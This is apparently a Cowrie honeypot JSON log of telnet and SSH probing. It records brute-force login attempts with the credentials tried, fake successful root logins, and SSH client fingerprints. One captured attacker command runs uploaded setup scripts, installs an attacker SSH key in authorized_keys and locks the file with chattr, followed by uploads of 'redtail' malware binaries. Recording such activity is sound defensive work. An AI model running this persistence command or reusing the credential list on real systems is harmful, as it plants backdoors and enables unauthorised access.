{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":52788,"dst_ip":"1.2.3.4","dst_port":23,"session":"acfcdb5d67c6","protocol":"telnet","message":"New connection: 139.59.27.234:52788 (1.2.3.4:23) [session: acfcdb5d67c6]","sensor":"my-vps","timestamp":"2025-08-28T14:38:24.830413Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T14:38:26.187452Z","src_ip":"139.59.27.234","session":"acfcdb5d67c6"}
{"eventid":"cowrie.session.closed","duration":3.359511375427246,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:28.189847Z","src_ip":"139.59.27.234","session":"acfcdb5d67c6"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":52794,"dst_ip":"1.2.3.4","dst_port":23,"session":"50aa57c52b79","protocol":"telnet","message":"New connection: 139.59.27.234:52794 (1.2.3.4:23) [session: 50aa57c52b79]","sensor":"my-vps","timestamp":"2025-08-28T14:38:28.445898Z"}
{"eventid":"cowrie.session.closed","duration":1.3860681056976318,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:29.831897Z","src_ip":"139.59.27.234","session":"50aa57c52b79"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":52806,"dst_ip":"1.2.3.4","dst_port":23,"session":"c39e877f41dc","protocol":"telnet","message":"New connection: 139.59.27.234:52806 (1.2.3.4:23) [session: c39e877f41dc]","sensor":"my-vps","timestamp":"2025-08-28T14:38:30.098910Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-28T14:38:31.785602Z","src_ip":"139.59.27.234","session":"c39e877f41dc"}
{"eventid":"cowrie.session.closed","duration":4.0276405811309814,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:34.126481Z","src_ip":"139.59.27.234","session":"c39e877f41dc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":39690,"dst_ip":"1.2.3.4","dst_port":23,"session":"a21329921836","protocol":"telnet","message":"New connection: 139.59.27.234:39690 (1.2.3.4:23) [session: a21329921836]","sensor":"my-vps","timestamp":"2025-08-28T14:38:34.407701Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:38:36.345061Z","src_ip":"139.59.27.234","session":"a21329921836"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:38:36.359828Z","src_ip":"139.59.27.234","session":"a21329921836"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:37.875990Z","src_ip":"139.59.27.234","session":"a21329921836"}
{"eventid":"cowrie.session.closed","duration":3.4713361263275146,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:37.878964Z","src_ip":"139.59.27.234","session":"a21329921836"}
{"eventid":"cowrie.session.closed","duration":120.01277589797974,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:38:53.983177Z","src_ip":"212.227.125.160","session":"d06ef6d39fe6"}
{"eventid":"cowrie.session.closed","duration":120.00318717956543,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:39:03.034392Z","src_ip":"212.227.125.160","session":"6892b9aef3ae"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63956,"dst_ip":"1.2.3.4","dst_port":22,"session":"c89ba7cd0554","protocol":"ssh","message":"New connection: 217.72.205.35:63956 (1.2.3.4:22) [session: c89ba7cd0554]","sensor":"my-vps","timestamp":"2025-08-28T14:39:38.980964Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:39:38.982262Z","src_ip":"217.72.205.35","session":"c89ba7cd0554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56642,"dst_ip":"1.2.3.4","dst_port":22,"session":"186987365c0d","protocol":"ssh","message":"New connection: 212.227.125.160:56642 (1.2.3.4:22) [session: 186987365c0d]","sensor":"my-vps","timestamp":"2025-08-28T14:39:47.887706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:39:47.888805Z","src_ip":"212.227.125.160","session":"186987365c0d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T14:39:47.948482Z","src_ip":"212.227.125.160","session":"186987365c0d"}
{"eventid":"cowrie.login.failed","username":"jito","password":"jito","message":"login attempt [jito/jito] failed","sensor":"my-vps","timestamp":"2025-08-28T14:39:48.129606Z","src_ip":"212.227.125.160","session":"186987365c0d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:39:49.191322Z","src_ip":"212.227.125.160","session":"186987365c0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47902,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1770be99e83","protocol":"ssh","message":"New connection: 212.227.125.160:47902 (1.2.3.4:22) [session: f1770be99e83]","sensor":"my-vps","timestamp":"2025-08-28T14:41:31.979260Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:41:31.980381Z","src_ip":"212.227.125.160","session":"f1770be99e83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48173,"dst_ip":"1.2.3.4","dst_port":22,"session":"151f27dab9a0","protocol":"ssh","message":"New connection: 212.227.125.160:48173 (1.2.3.4:22) [session: 151f27dab9a0]","sensor":"my-vps","timestamp":"2025-08-28T14:41:32.095448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:41:32.096630Z","src_ip":"212.227.125.160","session":"151f27dab9a0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T14:41:32.212183Z","src_ip":"212.227.125.160","session":"151f27dab9a0"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:41:32.560274Z","src_ip":"212.227.125.160","session":"151f27dab9a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T14:41:32.676629Z","session":"151f27dab9a0"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.197.182","src_port":19122,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6d805efba93","protocol":"ssh","message":"New connection: 64.62.197.182:19122 (1.2.3.4:22) [session: e6d805efba93]","sensor":"my-vps","timestamp":"2025-08-28T14:42:04.220129Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T14:42:04.221278Z","src_ip":"64.62.197.182","session":"e6d805efba93"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:42:04.222339Z","src_ip":"64.62.197.182","session":"e6d805efba93"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:42:42.095578Z","src_ip":"212.227.125.160","session":"151f27dab9a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62182,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dcdf3323074","protocol":"ssh","message":"New connection: 212.227.125.160:62182 (1.2.3.4:22) [session: 4dcdf3323074]","sensor":"my-vps","timestamp":"2025-08-28T14:43:12.285837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:43:12.287157Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:43:12.398847Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.login.failed","username":"user","password":"magnus","message":"login attempt [user/magnus] failed","sensor":"my-vps","timestamp":"2025-08-28T14:43:12.932982Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.login.failed","username":"user","password":"lesbians","message":"login attempt [user/lesbians] failed","sensor":"my-vps","timestamp":"2025-08-28T14:43:14.019990Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.login.failed","username":"user","password":"krishna","message":"login attempt [user/krishna] failed","sensor":"my-vps","timestamp":"2025-08-28T14:43:15.106512Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.login.failed","username":"user","password":"hungry","message":"login attempt [user/hungry] failed","sensor":"my-vps","timestamp":"2025-08-28T14:43:16.204892Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.login.failed","username":"user","password":"hhhhhh","message":"login attempt [user/hhhhhh] failed","sensor":"my-vps","timestamp":"2025-08-28T14:43:17.297499Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:43:18.384386Z","src_ip":"212.227.125.160","session":"4dcdf3323074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35035,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b506024ba19","protocol":"telnet","message":"New connection: 212.227.125.160:35035 (1.2.3.4:23) [session: 2b506024ba19]","sensor":"my-vps","timestamp":"2025-08-28T14:43:30.886468Z"}
{"eventid":"cowrie.session.closed","duration":31.31294560432434,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:44:02.199344Z","src_ip":"212.227.125.160","session":"2b506024ba19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42942,"dst_ip":"1.2.3.4","dst_port":22,"session":"79a1a6dfbea5","protocol":"ssh","message":"New connection: 212.227.125.160:42942 (1.2.3.4:22) [session: 79a1a6dfbea5]","sensor":"my-vps","timestamp":"2025-08-28T14:46:00.536536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:46:00.710702Z","src_ip":"212.227.125.160","session":"79a1a6dfbea5"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-28T14:46:01.848046Z","src_ip":"212.227.125.160","session":"79a1a6dfbea5"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123!*","message":"login attempt [root/zxc123!*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:46:05.486936Z","src_ip":"212.227.125.160","session":"79a1a6dfbea5"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:46:07.596614Z","src_ip":"212.227.125.160","session":"79a1a6dfbea5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33474,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f24766b010","protocol":"ssh","message":"New connection: 212.227.125.160:33474 (1.2.3.4:22) [session: 91f24766b010]","sensor":"my-vps","timestamp":"2025-08-28T14:46:07.660141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:46:07.660764Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:46:07.702971Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123!*","message":"login attempt [root/zxc123!*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:46:07.831643Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56260,"dst_ip":"1.2.3.4","dst_port":22,"session":"a15aade4e57d","protocol":"ssh","message":"New connection: 217.72.205.35:56260 (1.2.3.4:22) [session: a15aade4e57d]","sensor":"my-vps","timestamp":"2025-08-28T14:46:12.501010Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:46:12.502209Z","src_ip":"217.72.205.35","session":"a15aade4e57d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:46:17.791106Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.791975Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.836260Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.879477Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.881863Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.884700Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.887071Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.889780Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.891042Z","src_ip":"212.227.125.160","session":"91f24766b010"}
